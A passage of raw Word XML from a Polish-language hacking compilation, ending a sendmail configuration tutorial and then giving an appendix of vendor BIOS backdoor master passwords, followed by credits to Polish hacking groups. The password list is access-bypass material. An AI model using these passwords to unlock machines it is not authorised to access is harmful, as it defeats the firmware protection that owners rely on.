          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>rulesetem4</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p. "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>S=10/11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">" wykona </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ruleset 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> dla adresu z "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>envelope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">", a dla adresow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naglowka </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ruleset 11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">. Gdy w polu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> podany jest tylko jeden numer, to odnosi sie on tak do "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>envelope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>", jak i do naglowk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Pole </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> definiuje znak </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>EOL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - domyslnie jest nim </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>\n</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Baza uzytkownikow - User Database:</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st to bardzo uzyteczne "zwierzatko", umozliwia robienie wielu ciekawych rzeczy. W formacie BTree rekordy bazy uzytkownikow wygladaja ta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ab/>
        <w:t>username:nazwapol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gdzie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> to nazwa uzytkownika, z ktorym chcemy zrobic cos okreslone w nazwie nazwapol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bslugiwane nazwy pol t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maildrop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">   - adres, pod ktory dostarczac poczte danego us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mailname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">   - adres, pod jakim user jest widoczny "na swiecie"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mailsender</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - ???</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fullname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">   - pelne imie i nazwisko us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office-address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - adres biurowy us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office-phone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">   - telefon biurowy us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office-fax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">     - faks biurowy us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home-address </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  - adres domowy us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home-phone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">     - telefon domowy us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home-fax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">       - faks domowy user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project</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        - krotki opis projektu, do ktorego user nalezy</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plan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">          - wskaznik na plik z planem (o co tu chodz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becnie uzywa sie glownie pol "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>maildrop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>" i "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>mailname</w:t>
      </w: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Lista opcji sendmaila z command-li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bm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dostarcz poczte</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bs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>SMTP na wejsciu</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bd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rusz jako deamon</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 xml:space="preserve">-bt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Rusz w trybie testowym</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bv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Po angielsku "verify address"</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bi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Synonim polecenia mailq</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Cplik_konfiguracyjn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Uzyj alternatywnego pliku konfiguracyjnego</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dpozio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Ustawia poziom debug'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fadre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Ustawia adres maszyny nadawcy</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Fnazw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Ustawia pelna nazwe user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hliczb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Ustawia maksymalny hop count (liczba potraktowan sendmailem)</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n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  Bez aliasowania/forwardowania</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oxv</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Nadaje opcji x wartosc v</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pprotoko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Ustawia protokol nadawania, np: -pUUCP:uunet - UUCP do hosta uunet</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qczas</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Ustawia przetwarzanie kolejki co okreslony czas (lub natychmiast, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>jesl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nie podano czasu)</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qXstring</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Przetworz tylko listy zawierajace Xstring. Symbol X w tej definicji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 xml:space="preserve">moze przyjac wartosc I lub R lub S. Wiecej szczegolow - 'man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endmail'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New CE" w:hAnsi="Courier New CE" w:eastAsia="Courier New CE" w:cs="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>-t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  Patrz na linie "Cc:" i "Bcc:" oraz "To:" naglowka.</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Xlogfil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Rozumie sie samo przez sie - podanie pliku, do ktorego poleci log.</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 DODATKI ]</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t>&gt;&gt; Uniwersalne hasła BIOS'ów &lt;&lt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New CE" w:hAnsi="Courier New CE" w:eastAsia="Courier New CE" w:cs="Courier New CE"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>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BIOS Type                       BIOS Master Password(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Advanced Integration       </w:t>
        <w:tab/>
        <w:t xml:space="preserve">  Advanc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MI</w:t>
        <w:tab/>
        <w:t xml:space="preserve">                          589589</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M.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ammi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b/>
        <w:t xml:space="preserve">  AM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AMI!S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b/>
        <w:t xml:space="preserve">                    AMI.KE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b/>
        <w:t xml:space="preserve">              ami.kez</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b/>
        <w:t xml:space="preserve">  AMI?S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b/>
        <w:t xml:space="preserve">                          AMI_S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M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m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miam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mideco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MIPSW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mipsw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MISETU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bios310</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BIOSPAS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CMOSPW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helga-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HEWITT RAN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KILLCMO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mptron                         Polrt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ST                             SnuFG5</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Award                           ?awar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01322222</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1EAA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256256</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589589</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589721</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dmin</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lfarom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LL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PAf</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war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WARD S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ward.s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WARD?S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ward_?</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ward_p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WARD_P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WARD_S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awkwar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BIO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bio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biossta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biosta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CONCA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cond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COND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djone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efmuk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g6PJ</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h6BB</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HELGA-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HEWITT RAN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HL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j09F</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j256</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j262</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j322</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j64</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lkw pete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lkwpete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PASSWOR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E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etup</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KY_FOX</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WITCHES_SW</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xyz</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ZYX</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t0ch20x</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t0ch88</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TTPTH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ttpth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TzqF</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wodj</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ZAAAD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zbaaac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zjaaad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Biostar                         Biosta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Q54arwm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ompaq                          Compaq</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oncord                         las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TX International               CTX_123</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yberMax                        Congress</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aewoo                          Daewu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aytek                          Dayte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ell                            Del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Digital Equipment               kompr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Enox                            xo11n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Epox                            central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Freetech                        Posteri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HP Vectra                       hewlpack</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BM                             IB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MBIU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sertafu</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Iwill                           iwil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etWay                          spoom1</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Joss Technology                 57gbz6</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technolg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 Technology                    mMmM</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achSpeed                       sp99dd</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agic-Pro                       pros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egastar                        star</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icron                          sldkj754</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xyzall</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Micronics                       dn_04rjc</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Nimble                          xdfk9874t3</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Packard Bell                    bell9</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QDI                             QD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Quantex                         teX1</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xljlbj</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Research                        Col2ogro2</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huttle                         Spacve</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iemens Nixdorf                 SKY_FOX</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peedEasy                       lesarot1</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SuperMicro                      ksdjfg934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inys                           tiny</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MC                             BIGO</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Toshiba                         24Banc81</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Toshib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toshy99</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Vextrec Technology              Vextrex</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Vobis                           merlin</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IMBIOSnbsp BIOS v2.10          Compleri</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enith                          3098z</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xml:space="preserve">                                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Zenith</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ZEOS                            zeosx</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o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>[</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SPECIALNE PODZIĘKOWANIA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>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Dead Hackers Society FAQ ---</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Hacking Serwis by Iceluck ---</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SH4DOW FAQ ---</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UndergroundPL ---</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 4HaCKeRS ---</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lcamtuf, Icelul, craYfish, sh4d0w, P0WER, Luke_Skyw, nightdrg, deefes, marqss, arenus, L4vim, MajDom, Bohun</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Gutek, Binboy, sufur, lamentes, stoned, rola</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lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">także pozdrawiam wszystkich z grupy hackpl, hackpl1 i underground-pl </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Chciałbym podziękować wszystkim tym którzy przyczynili się do rozwoju hackingu w Polsce. Szczególne podziękowania należą się tym osobą których część textów bez ich zgody znalazłą się właśnie tutaj.</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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New CE" w:hAnsi="Courier New CE" w:eastAsia="Courier New CE" w:cs="Courier New CE"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>[ MSS-00670-6681 FAQ ]</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ritten by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Jerry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>&lt;jerry@suntar.com.pl&g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t>========================================</w:t>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center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New CE" w:hAnsi="Courier New CE" w:eastAsia="Courier New CE" w:cs="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="right"/>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t>Jeszcze o mnie usłyszycie...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New CE" w:hAnsi="Courier New CE" w:eastAsia="Courier New CE" w:cs="Courier New CE"/>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-P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CE">
    <w:charset w:val="ee"/>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